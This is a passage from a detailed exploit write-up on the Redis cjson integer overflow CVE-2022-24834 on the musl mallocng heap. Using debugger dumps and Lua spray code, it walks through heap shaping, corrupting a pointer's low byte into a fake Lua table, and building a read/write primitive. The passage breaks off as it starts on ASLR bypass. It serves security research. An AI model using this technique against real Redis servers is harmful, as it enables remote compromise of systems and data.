        nominal size : 0x100
       reserved size : 0x2c
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

The first chunk we see under the == SLOT == head has a
cycling offset of 1. We can see that the slot itself starts at
0x7ffff7a94e30, but the user data does not start at the same address,
but rather 0x10-bytes further. This is due to the cycling offset *
UNIT adjustment. If we quickly look at a Table
(stride 0x50) slot, which is of a size that doesn’t allow enough slack
to use a cycling offset, we can see the difference:

pwndbg> mchunkinfo 0x7ffff7a94740
============== IN-BAND META ==============
        INDEX : 11
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x37 (group --> 0x7ffff7a943c0)

================= GROUP ================== (at 0x7ffff7a943c0)
         meta : 0x555555a68ea0
   active_idx : 11

================== META ================== (at 0x555555a68ea0)
         prev : 0x555555a686f8
         next : 0x555555a68d38
          mem : 0x7ffff7a943c0
     last_idx :
   avail_mask : 0x0   (0b00000000000)
   freed_mask : 0x5ac (0b10110101100)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]FUFFUFUFFUU (from slot 11 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : Do nothing

================== SLOT ================== (at 0x7ffff7a94740)
      cycling offset : 0x0 (userdata --> 0x7ffff7a94740)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

Above, we see the SLOT section indicates a cycling
offset of 0. This will hold true for all Table allocations
in a stride 0x50 group. In this case, the user data starts at the same
location as the slot.

So now let’s look at the second stride 0x140 group’s slot that we
allocated earlier:

pwndbg> p/x ((Table *)  0x7ffff7a93d80)->array
$4 = 0x7ffff7a96ca0
pwndbg> mchunkinfo 0x7ffff7a96ca0
============== IN-BAND META ==============
        INDEX : 1
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x17 (group --> 0x7ffff7a96b20)

================= GROUP ================== (at 0x7ffff7a96b20)
         meta : 0x555555a690e0
   active_idx : 2

================== META ================== (at 0x555555a690e0)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a96b20
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: U[U]U (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a96c70)
      cycling offset : 0x3 (userdata --> 0x7ffff7a96ca0)
        nominal size : 0x100
       reserved size : 0xc
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

This second array has a cycling offset of 3, so it starts 0x30 bytes
further than the start of the slot. Clearly, this slot has been used a
few times already.

The main takeaways here are:

For certain allocation sizes, the exact offset of an overflow may be
unreliable unless you know exactly how many times the slot has been
allocated.
For a scenario like overwriting the LSB of a pointer inside of such
a group, you could be unable to predict where the resulting pointer will
point inside of another slot, depending on whether you know how many
times each slot has been used.

Considering all this in the context of the exploit this article
describes, I think that because we have fine-grained control over all
the allocations performed for our overflow, this mitigation wouldn’t
have stopped us. Even if the structures had been on a ‘stride’ group
that uses the cycling offsets, because we can easily control the number
of times the slots are actually used prior to overflow. That said, since
I originally thought it might be a problem and wanted to understand it,
hopefully the explanation was still interesting.

With that out of the way, let’s look into how to exploit
CVE-2022-24834 on the musl heap.

Exploiting
CVE-2022-24834 on the mallocng heap

To quickly recap the vulnerability, it’s an integer overflow when
calculating the size of a buffer to allocate while doing cjson encoding.
By triggering the overflow, we end up with an undersized buffer that we
can write 0x15555555 bytes to (341 MiB), which may be large enough to
qualify as a “wild copy,” although on a 64-bit target and the amount of
memory on modern systems, it’s not too hard to deal with. Exploitation
requires that the target buffer that we want to corrupt must be adjacent
to the overflown buffer with no unmapped gaps in between, so at a
minimum around 350 MiB.

While exploiting ptmalloc2, Ricerca Security solved this problem by
extending the heap, which is brk()-based, to ensure that
enough space exists. Once the extension occurs, it won’t be shrunk
backward. This makes it easy to ensure no unmapped memory regions exist,
and that the 0x15555555-byte copy won’t hit any invalid memory.

This adjacent memory requirement poses some different problems on the
mallocng heap, which I’ll explain shortly.

After achieving the desired layout, the goal is to overwrite some
target chunk (or slot in our case) with the 0x22 value corresponding to
the ending double quote. In the Ricerca Security write-up, their
diagrams indicated they overwrote the LSB pointer of a
Table->array pointer; however, I believe their exploit
actually overwrites the LSB of a TValue->value pointer,
which exists in a chunk that is pointed to by the
Table->array. I may misunderstand their exploit, but at
any rate, the latter is the approach I used.

To summarize, the goal of the heap shaping is ultimately to ensure
that the allocation associated with a table’s array, which is pointed to
by Table->array, is adjacent to the buffer we overflow
so that we corrupt the TValue.

mallocng Heap Shaping

mallocng requires a different strategy than ptmalloc2, as it does not
use brk(). Rather, it will use mmap() to
allocate groups (below I will assume that the group itself is not a slot
of another group) and populate those groups with various fixed-size
slots. Freeing the group, which may occur if all of the slots in a group
are no longer used, results in memory backing the group to be unmapped
using munmap().

This means we must leverage feng shui to have valid in-use
allocations adjacent to each other at the time of the overflow. While
doing this, in order to analyze gaps in the memory space, I wrote a
small gdb utility which I’ll use to show the layout that we are working
with. A slightly modified version of this utility has also now been
added to pwndbg.

First, let’s look at what happens if we trigger the bug and allow the
copy to happen, without first shaping the heap. Note this first example
is showing the entire memory space to give an idea of what it looks
like, but in future output, I will limit what’s shown to more relevant
mappings.

The annotations added to to the mapping output are as follows:

^-- ADJ: <num> indicates a series of adjacent
memory regions, where <num> is the accumulated
size
!!! GUARD PAGE indicates a series of pages with no
permissions, which writing to would trigger a fault
[00....0] -- GAP: <num> indicates an unmapped
page between mapped regions of memory, where <num> is
the size of the gap

   0: 0x555555554000 - 0x5555555bf000    0x6b000 r--p
   2: 0x5555555bf000 - 0x555555751000   0x192000 r-xp
   3: 0x555555751000 - 0x5555557d3000    0x82000 r--p
   4: 0x5555557d3000 - 0x5555557da000     0x7000 r--p
   5: 0x5555557da000 - 0x555555833000    0x59000 rw-p
   6: 0x555555833000 - 0x555555a66000   0x233000 rw-p ^-- ADJ: 0x512000
   7: 0x555555a66000 - 0x555555a67000     0x1000 ---p !!! GUARD PAGE
   7: 0x555555a67000 - 0x555555af7000    0x90000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa2ed09000
   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x24348000
  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000
  13: 0x7ffff4717000 - 0x7ffff4c01000   0x4ea000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x1000
  14: 0x7ffff4c02000 - 0x7ffff4e00000   0x1fe000 rw-p
  15: 0x7ffff4e00000 - 0x7ffff5201000   0x401000 rw-p
  16: 0x7ffff5201000 - 0x7ffff5c00000   0x9ff000 rw-p
  17: 0x7ffff5c00000 - 0x7ffff5e01000   0x201000 rw-p
  18: 0x7ffff5e01000 - 0x7ffff6000000   0x1ff000 rw-p ^-- ADJ: 0x13fe000
  19: 0x7ffff6000000 - 0x7ffff6002000     0x2000 ---p !!! GUARD PAGE
  19: 0x7ffff6002000 - 0x7ffff6404000   0x402000 rw-p
  21: 0x7ffff6404000 - 0x7ffff6600000   0x1fc000 rw-p ^-- ADJ: 0x5fe000
  22: 0x7ffff6600000 - 0x7ffff6602000     0x2000 ---p !!! GUARD PAGE
  22: 0x7ffff6602000 - 0x7ffff6a04000   0x402000 rw-p
  24: 0x7ffff6a04000 - 0x7ffff6a6e000    0x6a000 rw-p
  25: 0x7ffff6a6e000 - 0x7ffff6c00000   0x192000 rw-p ^-- ADJ: 0x5fe000
  26: 0x7ffff6c00000 - 0x7ffff6c02000     0x2000 ---p !!! GUARD PAGE
  26: 0x7ffff6c02000 - 0x7ffff7004000   0x402000 rw-p
  28: 0x7ffff7004000 - 0x7ffff7062000    0x5e000 rw-p
  29: 0x7ffff7062000 - 0x7ffff715c000    0xfa000 rw-p
  30: 0x7ffff715c000 - 0x7ffff71ce000    0x72000 rw-p
  31: 0x7ffff71ce000 - 0x7ffff7200000    0x32000 rw-p
  32: 0x7ffff7200000 - 0x7ffff7a00000   0x800000 rw-p
  33: 0x7ffff7a00000 - 0x7ffff7a6f000    0x6f000 rw-p ^-- ADJ: 0xe6d000
  34: 0x7ffff7a6f000 - 0x7ffff7a71000     0x2000 ---p !!! GUARD PAGE
  34: 0x7ffff7a71000 - 0x7ffff7ac5000    0x54000 rw-p
  36: 0x7ffff7ac5000 - 0x7ffff7b0e000    0x49000 r--p
  37: 0x7ffff7b0e000 - 0x7ffff7dab000   0x29d000 r-xp
  38: 0x7ffff7dab000 - 0x7ffff7e79000    0xce000 r--p
  39: 0x7ffff7e79000 - 0x7ffff7ed2000    0x59000 r--p
  40: 0x7ffff7ed2000 - 0x7ffff7ed5000     0x3000 rw-p
  41: 0x7ffff7ed5000 - 0x7ffff7ed8000     0x3000 rw-p
  42: 0x7ffff7ed8000 - 0x7ffff7ee9000    0x11000 r--p
  43: 0x7ffff7ee9000 - 0x7ffff7f33000    0x4a000 r-xp
  44: 0x7ffff7f33000 - 0x7ffff7f50000    0x1d000 r--p
  45: 0x7ffff7f50000 - 0x7ffff7f5a000     0xa000 r--p
  46: 0x7ffff7f5a000 - 0x7ffff7f5e000     0x4000 rw-p
  47: 0x7ffff7f5e000 - 0x7ffff7f62000     0x4000 r--p
  48: 0x7ffff7f62000 - 0x7ffff7f64000     0x2000 r-xp
  49: 0x7ffff7f64000 - 0x7ffff7f78000    0x14000 r--p
  50: 0x7ffff7f78000 - 0x7ffff7fc4000    0x4c000 r-xp
  51: 0x7ffff7fc4000 - 0x7ffff7ffa000    0x36000 r--p
  52: 0x7ffff7ffa000 - 0x7ffff7ffb000     0x1000 r--p
  53: 0x7ffff7ffb000 - 0x7ffff7ffc000     0x1000 rw-p
  54: 0x7ffff7ffc000 - 0x7ffff7fff000     0x3000 rw-p ^-- ADJ: 0x58e000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7fdf000
  55: 0x7ffffffde000 - 0x7ffffffff000    0x21000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xffff7fffff601000
  56: 0xffffffffff600000 - 0xffffffffff601000     0x1000 --xp

When we crash we see:

Thread 1 "redis-server" received signal SIGSEGV, Segmentation fault.
0x00005555556cd676 in json_append_string ()
(gdb) x/i $pc
=> 0x5555556cd676 <json_append_string+166>:     mov    %al,(%rcx,%rdx,1)
(gdb) info registers rcx rdx
rcx            0x7ffff3749010      140737277890576
rdx            0x14b7ff0           21725168
(gdb) x/x $rcx+$rdx
0x7ffff4c01000: Cannot access memory at address 0x7ffff4c01000

Our destination buffer (the buffer being copied to) was allocated at
0x7ffff3749010 (index 12), and after 0xfc1000 bytes, it
quickly writes into unmapped memory, which correlates to what we just
saw in the gap listing:

  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000

In this particular case, even if this gap didn’t exist, because we
didn’t shape the heap, we will inevitably run into a guard page and fail
anyway.

Similarly to the original exploit, shaping the heap to fill these
gaps is quite easy by just allocating lots of tables that point to
unique strings or large arrays of floating-point values. During this
process, it’s also useful to pre-allocate lots of other tables that are
used for different purposes, as well as anything else that may otherwise
create unwanted side effects on our well-groomed heap.

Ensuring Correct
Target Table->Array Distance

After solving the previous issue, the next problem is that even if we
fill the gaps, we have to be careful where our target buffer (the one we
want to corrupt) ends up being allocated. We need to take into account
that the large allocations for the source buffer (the one we copy our
controlled data from) might also be mapped at lower addresses in memory
than the target buffer, which might not be ideal. From the large gap map
listing above, we can see some large allocations at index 9 and 11,
which are related to generating a string large enough for the source
buffer to actually trigger the integer overflow.

   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p

Both the 9 and 11 mappings are roughly as big or larger than the
amount of memory that will actually be writing during our overflow, so
if our cjson buffer ends up being mapped before one of these maps, the
overflow will finish inside of the large string map and thus be useless.
Although in the case above our destination buffer (index 12) was
allocated later in memory than 9 and 11 and so won’t overflow into them,
in practice after doing heap shaping to fill all the gaps, this won’t
necessarily be the case.

This is an example of what that non-ideal scenario might look
like:

To resolve this, we must first shape the heap so that the target slot
we want to corrupt is actually mapped with an address lower than the
large mappings used for the source string. In this way, we can ensure
that our destination buffer ends up being directly before the target,
with only the exact amount of distance we need in between. To ensure
that our target slot gets allocated where we want, it needs to be large
enough to be in a single-slot group.

In order to ensure that our target buffer slot’s group gets allocated
after the aforementioned large strings, we can abuse the fact that we
can leak table addresses using Lua. By knowing the approximate size of
the large maps, we can predict when our target buffer would be mapped at
a lower address in memory and avoid it. By continuously allocating large
tables and leaking table addresses, we can work through relatively
adjacent mappings and eventually get an address that suddenly skips a
significantly sized gap, correlating to the large string allocations we
want to avoid. After this point, we can safely allocate the target
buffer we want to corrupt, followed by approximately 0x15556000 bytes of
filler memory, and then finally the destination buffer of the vulnerable
copy that we will overflow. Just a reminder, this order is in reverse of
what you might normally expect because each group is mmap()’ed at lower
addresses, but we overflow towards larger addresses.

The filler memory must still be adjacently mapped so that the copy
from the vulnerable cjson buffer to the target slot won’t encounter any
gaps. mallocng uses specific size thresholds for allocations that
determine the group they fit in. Each stride up to a maximum threshold
has an associated ‘sizeclass’. There are 48 sizeclasses. Anything above
the MMAP_THRESHOLD (0x1FFEC) will fall into a ‘special’
sizeclass 63. In these cases, it will map a single-slot group just for
that single allocation only. We can utilize this to trigger large
allocations that we know will be of a fixed size, with fixed contents,
and won’t be used by any other code. I chose to use mappings of size
0x101000, as I found they were consistently mapped adjacent to each
other by mmap(), as sizes too large or too small seemed to
occasionally create unwanted gaps.

To actually trigger the large allocations, I create a Lua table of
floating pointer numbers. The array contains TValue
structures with inline numeric values. Therefore, we just need to create
a table with an array big enough to cause the 0x101000 map (keeping in
mind the in-band metadata, which will add overhead). I do something like
this:

-- pre-allocate tables
for i = 1, math.floor(0x15560000 / 0x101000) + 1 do
    spray_pages[i] = {}
end
...
-- trigger the 0x101000-byte mappings
for i = 1, #spray_pages do
    for j = 1, 0xD000 do
        spray_pages[i][j] = 0x41414141
    end
end

I used the gap mapping script to confirm this behavior while
debugging and eventually ended up with something like this, where each
new table allocation ends up with a new array mapping like this:

   7: 0x555555a67000 - 0x5555564a1000   0xa3a000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa4439c000
   9: 0x7fff9a83d000 - 0x7fff9a93e000   0x101000 rw-p
  10: 0x7fff9a93e000 - 0x7fff9aa3f000   0x101000 rw-p
  11: 0x7fff9aa3f000 - 0x7fff9ab40000   0x101000 rw-p
  12: 0x7fff9ab40000 - 0x7fff9ac41000   0x101000 rw-p
  13: 0x7fff9ac41000 - 0x7fff9ad42000   0x101000 rw-p
  ...
 350: 0x7fffafe92000 - 0x7fffb0093000   0x201000 rw-p
 351: 0x7fffb0093000 - 0x7fffd00a4000 0x20011000 rw-p
 352: 0x7fffd00a4000 - 0x7fffd80a5000  0x8001000 rw-p ^-- ADJ: 0x3d868000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2000
...

So the layout will ultimately look something like:

In the diagram above, the “source string slot” is the buffer from
which we copy our controlled data. The “cjson overflow slot” is the
vulnerable destination buffer that we overflow due to the integer
overflow, and the “target slot” is the victim buffer that we will
corrupt with our 0x22 byte.

There is one more thing which is that the exact offset of the
overflow may change by a small amount if the Lua script changes, or if
there are other side effects on the heap. This seems due to allocations
being made on the index 350 mapping above, before our actual target
buffer. I didn’t investigate this a lot, but it is likely solvable to
get rid of the indeterminism entirely. I chose to work around it by
using a slightly smaller offset, and repeatedly triggering the overflow
and increasing the length. The main caveat of multiple attempts is that
due to corruption of legitimate chunks we have to avoid the garbage
collector firing. Also, Lua has read-only strings, so each string being
allocated needs to be unique, so for each attempt that we make, it will
consume a few hundred MB of memory. In the event that our offset is too
far away, we may well exhaust the memory of the target before we
succeed. In practice, this isn’t a big issue, as once the exploit is
stable and the code isn’t changing, this offset won’t change.

Successful brute force applied to the previous example looks
something like this:

Lua Table Confusion

With that out of the way, we can get to the more interesting part. As
noted, we corrupt the LSB of a TValue structure such that
TValue->value points outside its original slot
boundaries. This leads to a sort of type confusion, where we can point
it into a different slot with data we control.

The corrupted array is like so:

While targeting ptmalloc2, the Ricera Security researchers showed
that it’s possible to modify a TValue that originally
pointed to a Table, and change its pointer such that it
points to a controlled part of a TString chunk, which
contains a fake Table structure. This can then be used to
kick off a read/write primitive. We can do something similar on
mallocng; however, we have much more strict limitations because the
group holding the Table structure referenced by our
corrupted TValue only contains other fixed-size slots, so
we will only be able to adjust the offset to point to these. Let’s take
a look at these constraints.

Because of the fixed-size slots, our “confused” table will overlap
with two 0x50-byte slots. Depending on the TValue address
being corrupted, it may still partially overlap with itself (as this
graphic shows):

A Lua string is made up of a structure called TString,
which is 0x18 bytes. It is immediately followed by the actual
user-controlled string data. This means that if we want to place a Lua
string into a group holding a Table, we will be limited by
how many bytes we actually control.

(gdb) ptype /ox TString
type = struct TString {
/* 0x0000      |  0x0008 */        GCObject *next;
/* 0x0008      |  0x0001 */        lu_byte tt;
/* 0x0009      |  0x0001 */        lu_byte marked;
/* 0x000a      |  0x0001 */        lu_byte reserved;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */        unsigned int hash;
/* 0x0010      |  0x0008 */        size_t len;

/* total size (bytes):   0x18 */
}

A Table is 0x48 bytes and is placed on a 0x50-stride
group. This means that only the last 0x30 bytes of a string can be used
to fully control the Table contents, assuming a direct
overlap.

(gdb) ptype /ox Table
type = struct Table {
/* 0x0000      |  0x0008 */    GCObject *next;
/* 0x0008      |  0x0001 */    lu_byte tt;
/* 0x0009      |  0x0001 */    lu_byte marked;
/* 0x000a      |  0x0001 */    lu_byte flags;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */    int readonly;
/* 0x0010      |  0x0001 */    lu_byte lsizenode;
/* XXX  7-byte hole      */
/* 0x0018      |  0x0008 */    struct Table *metatable;
/* 0x0020      |  0x0008 */    TValue *array;
/* 0x0028      |  0x0008 */    Node *node;
/* 0x0030      |  0x0008 */    Node *lastfree;
/* 0x0038      |  0x0008 */    GCObject *gclist;
/* 0x0040      |  0x0004 */    int sizearray;
/* XXX  4-byte padding   */

/* total size (bytes):   0x48 */
}

In practice, because we are dealing with a misaligned overlap, we can
still leverage all of the user-controlled TString data. As
previously mentioned, we don’t control the exact offset into the
TString we end up using. We are restricted by the fact that
the value written is 0x22. As it turns out, it’s still possible to make
it work, but it’s a little bit finicky.

To solve this problem, we need to figure out what the ideal
overlapping offset into a TString would be, such that we
fully control Table->array in our confused table. Even
if we control this array member though, we still need to
see what side effects exist and how they affect the other
Table fields. If some uncontrolled data pollutes a field in
a particular way, it could mean we can’t actually abuse the
array field.

Let’s look at the offsets of our slots inside the fixed-sized group.
If we know the address of a table from which we can start:

(gdb) p/x *(Table *) 0x7ffff7a5fa30
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffafe92650 <lua_table^> 0x7ffff497cac0,
  [2] = (TValue *) 0x7fffafe92660 <lua_table^> 0x7ffff7a5fad0,
  [3] = (TValue *) 0x7fffafe92670 <lua_table^> 0x7ffff7a5fb20,
  ...

Here we have a table at 0x7ffff7a5fa30, whose
array value contains a bunch of other tables. We want to,
however, analyze the 0x50-stride group that this table is on, as well as
the other slots in this group.

We can use mchunkinfo from the muslheap library to take a
look at the associated slot group.

(gdb) mchunkinfo 0x7ffff7a5fa30
============== IN-BAND META ==============
        INDEX : 8
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x28 (group --> 0x7ffff7a5f7a0)

================= GROUP ================== (at 0x7ffff7a5f7a0)
         meta : 0x555555aefc48
   active_idx : 24

================== META ================== (at 0x555555aefc48)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a5f7a0
     last_idx : 24
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x232d7200e6a00d1e
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: UUUUUUUUUUUUUUUU[U]UUUUUUUU (from slot 24 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[4])

================== SLOT ================== (at 0x7ffff7a5fa30)
      cycling offset : 0x0 (userdata --> 0x7ffff7a5fa30)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

We can confirm that the stride is 0x50, and the slot size is 0x48.
The Slot status map shows that this group is full, and our
slot is at index 8 (designated by [U] and indexed in
reverse order). Also, the cycling offset is 0, which means
that the userdata associated with the slot actually starts at the
beginning of the slot. As we saw earlier, this will be very useful to
us, as we will rely on predictable relative offsets between slots in the
group.

What we are most interested in is how overwriting the LSB of a slot
at a specific offset in this group will influence what we control during
the type confusion. I’ll use an example to make it clearer. Let’s print
out all the offsets of all the slots in this group:

 0: 0x7ffff7a5f7a0
 1: 0x7ffff7a5f7f0
 2: 0x7ffff7a5f840
 3: 0x7ffff7a5f890
 4: 0x7ffff7a5f8e0
 5: 0x7ffff7a5f930
 6: 0x7ffff7a5f980
 7: 0x7ffff7a5f9d0
 8: 0x7ffff7a5fa20 (B2)
 9: 0x7ffff7a5fa70
10: 0x7ffff7a5fac0 (B)
11: 0x7ffff7a5fb10 (A), (A2)
12: 0x7ffff7a5fb60
13: 0x7ffff7a5fbb0
14: 0x7ffff7a5fc00
15: 0x7ffff7a5fc50
16: 0x7ffff7a5fca0
17: 0x7ffff7a5fcf0
18: 0x7ffff7a5fd40
19: 0x7ffff7a5fd90
20: 0x7ffff7a5fde0
21: 0x7ffff7a5fe30
22: 0x7ffff7a5fe80
23: 0x7ffff7a5fed0
24: 0x7ffff7a5ff20

Before going further, I want to note that other than the
Table being targeted by the overwrite, these stride 0x50
slots can be TString values that we control, so below if I
say target index N, it means the slot at index N is a
Table, but you can assume that slots adjacent (N-1 and N-2)
to it are controlled TString structures.

Let’s start from the lowest LSB in the list and go until the pattern
repeats. We see at 2, the LSB is 0x40, then the pattern repeats at
offset 18. That means we only need to analyze candidate tables between 2
and 17 to cover all cases. We want to see what will happen if we
overwrite any of these entries with 0x22. Where does it fall within an
earlier slot, and how might that influence what we control? Since when
we trigger this confusion, due to the uncontrolled value 0x22, we are
guaranteed to overlap two different 0x50-byte slots, so we may want to
control them both.

A quick refresh in case you’ve forgotten, remember that we are
corrupting the LSB of a TValue in some table’s
Table->array buffer, and that TValue will
point to one of the slots in a group as we are analyzing.

I’ll choose a bad example of a table to target first. Assume we
decide to corrupt the LSB of index 11 (marked with (A)
above), which is at 0x7ffff7a5fb10. If we corrupt its LSB
with 22, we get a confused table at
0x7ffff7a5fb22 so we end starting the confused table inside
of the associated Table. I’ve indicated this above with
(A2) to show they are roughly at the same location. In this
scenario we don’t control the contents of the (A) table at
all, and thus most of (A2) is not controlled. Only the
0x12 bytes of the slot at index 12, which follows the
confused Table will actually be controlled, so probably not
ideal.

Okay, now we should find a better candidate… something that if we
corrupt it, we can jump back some large distance and overlap at least
one TString structure. I’ll be biased and choose the one
that works, but in practice, some trial and error was required. Let’s
target index 10 (marked with (B)), which is at address
0x7ffff7a5fac0. If we corrupt this, we will point to
0x7ffff7a5fa22 (marked with (B2)). Here
(B) will overlaps with both index 8 and the first two bytes
of 9. In this scenario, index 8 could be a TString, which
we control.

Assuming we have a controlled TString, we can check what
our confused Table will look like. First, this is what the
TString looks like (no misaligned access):

(gdb) p/rx *(TString *) 0x7ffff7a5fa20
$7 = {
  tsv = {
    next = 0x7ffff3fa2460,
    tt = 0x4,
    marked = 0x1,
    reserved = 0x0,
    hash = 0xb94dc111,
    len = 0x32
(gdb) x/50b 0x7ffff7a5fa20+0x18
0x7ffff7a5fa38: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa40: 0x00    0x00    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffff7a5fa48: 0x41    0x41    0x30    0x30    0x30    0x30    0x30    0x30
0x7ffff7a5fa50: 0x30    0x31    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa58: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa60: 0x00    0x00    0xff    0xff    0xff    0x7f    0x00    0x00
0x7ffff7a5fa68: 0x00    0x00

We see the TString header values, and then 0x32-bytes of
controlled data. This data I’ve already populated at the right offsets
to demonstrate what values in a confused Table we can
control.

Now let’s look at the confused Table at the misaligned
offset:

(gdb) p/rx *(Table *)  0x7ffff7a5fa22
$5 = {
  next = 0x10400007ffff3fa,
  tt = 0x0,
  marked = 0x0,
  flags = 0x11,
  readonly = 0x32b94d,
  lsizenode = 0x0,
  metatable = 0x0,
  array = 0x4141414141414141,
  node = 0x3130303030303030,
  lastfree = 0x0,
  gclist = 0x0,
  sizearray = 0x7fffffff
}

As would be expected, the uncontrolled parts of TString
are clobbering the fields next through
readonly. But we can easily control the array
and the sizearray fields.

One problem is that the readonly flag is non-zero, which
means even if we get Lua to use this table, we’re not going to be able
to use it for a write primitive. So we will have to work around this
(more on how shortly).

It may also look like we are in trouble because the tt
member is clobbered and no longer is of type LUA_TTABLE.
Fortunately, this isn’t a problem because when accessing numbered index
members inside of a table’s array, Lua will use the type specified by
the TValue pointing at the object to determine its type. It
won’t ever reference the type information inside the object. The type
information inside the object is used specifically by the garbage
collector, which we won’t plan on running. Similarly, the
next pointer is only used by the garbage collector, so it
being invalid is no problem.

We can look at luaH_get() to confirm:

/*
** main search function
*/
const TValue *luaH_get (Table *t, const TValue *key) {
  switch (ttype(key)) {
    case LUA_TNIL: return luaO_nilobject;
    case LUA_TSTRING: return luaH_getstr(t, rawtsvalue(key));
    case LUA_TNUMBER: {
      int k;
      lua_Number n = nvalue(key);
      lua_number2int(k, n);
      if (luai_numeq(cast_num(k), nvalue(key))) /* index is int? */
        return luaH_getnum(t, k);  /* use specialized version */
      /* else go through */
    }
    ...

When looking up a table by index, if the index value is a number, we
encounter the LUA_TNUMBER case. This triggers a call to
luaH_getnum(), which is:

const TValue *luaH_getnum (Table *t, int key) {
  /* (1 <= key    key <= t->sizearray) */
  if (cast(unsigned int, key-1) < cast(unsigned int, t->sizearray))
    return  t->array[key-1];
  else {
    ...

This function will return the TValue from the
Table->array value. The TValue contains its
own tt member, as mentioned earlier. This
TValue may be utilized later by some Lua code to access it
as a Table, which is handled by
luaV_gettable.

void luaV_gettable (lua_State *L, const TValue *t, TValue *key, StkId val) {
  int loop;
  for (loop = 0; loop < MAXTAGLOOP; loop++) {
    const TValue *tm;
    if (ttistable(t)) {  /* `t' is a table? */
      Table *h = hvalue(t);
      const TValue *res = luaH_get(h, key); /* do a primitive get */
      if (!ttisnil(res) ||  /* result is no nil? */
          (tm = fasttm(L, h->metatable, TM_INDEX)) == NULL) { /* or no TM? */
        setobj2s(L, val, res);
        return;
      }
      /* else will try the tag method */
    }
    ...

We can see above that the parameter t of type
TValue is being passed and used as a Table.
The code uses ttistable(t) to ensure that the
TValue indicates that it is a table:

#define ttistable(o) (ttype(o) == LUA_TTABLE)

If it is a table, it calls into the luaH_get() to
reference whatever index is being requested. We know that
luaH_get() itself doesn’t check the
Table->tt value. So we see that if we corrupt a
TValue to point to a confused table, and then access the
associated Table structure to fetch objects, we can do it
without the corrupted Table->tt value ever being
validated, meaning we can use the read-only Table to read
other, possibly more controlled objects.

So, we’ve now got a spoofed read-only table that we can use, which
can be visualized as:

Let’s use our read-only Table to try to read a
controlled writable Table object. The first question is,
where do we point our read-only Table->array member? The
leak primitive that Lua gives us only will leak addresses of tables, so
we’re still only limited to values on a similarly fixed-size slot.
However, in this case, we aren’t limited to only overwriting an LSB with
0x22, so what do we do? First, we need to point
Table->array to a fake TValue that itself
points to yet another fake Table object.

Because we are able to control other fields inside our read-only
Table that don’t need to be valid, and because I already
leaked its address, I chose Table->array to be inside
the Table itself. By re-using the
Table->lastfree and Table->gclist
members, we can plant a new TValue of type
LUA_TTABLE, and we can point TValue->value
to some other offset inside the 0x50-stride group. So where should we
point it this time?

Experimentation showed that by pointing to an offset of 0x5 into a
TString, we can create a confused Table where
Table->readonly is NULL, and we are still
able to control the Table->array pointer with controlled
string contents.

What we end up with looks like this:

Since this table is writable, we will point its
Table->array to yet another table’s
Table->array address. This final Table
becomes our actual almost-arbitrary read/write (AARW) primitive. Using
insertions onto our writable confused table allows us to control the
address the r/w table will point to. At this point we are finally back
to where the original Ricera Security exploit expects to be.

This ultimately looks like so:

This AARW is a bit cumbersome, so the conviso exploit sets up a
TString object on the heap and modifies its length, to
allow for larger swaths of memory to be read in one go.

redis-server/libc
ASLR Bypass and Code Execution

The conviso labs exploit also used a trick originally documented by
saelo
that abuses the fact that a CCoroutine that uses
yield() will end up using setjmp(). This means
